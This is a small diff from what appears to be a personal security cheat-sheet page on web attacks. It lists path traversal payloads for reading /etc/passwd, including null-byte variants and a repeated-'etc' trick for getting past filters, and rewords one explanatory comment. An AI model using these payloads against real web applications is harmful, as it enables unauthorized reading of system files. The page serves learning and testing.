2h3ph3rd/2h3ph3rd.github.io/docs/security/05-web/index.md

 ../../../etc/passwd%00
 ../../../etc/passwd\0

-# if validation is done over the first 'etc' match and right after string
+# if validation is done over the first match of the string 'etc' and what is right after
 ../../../etc/../etc/passwd

 # if '/etc/passwd' is filtered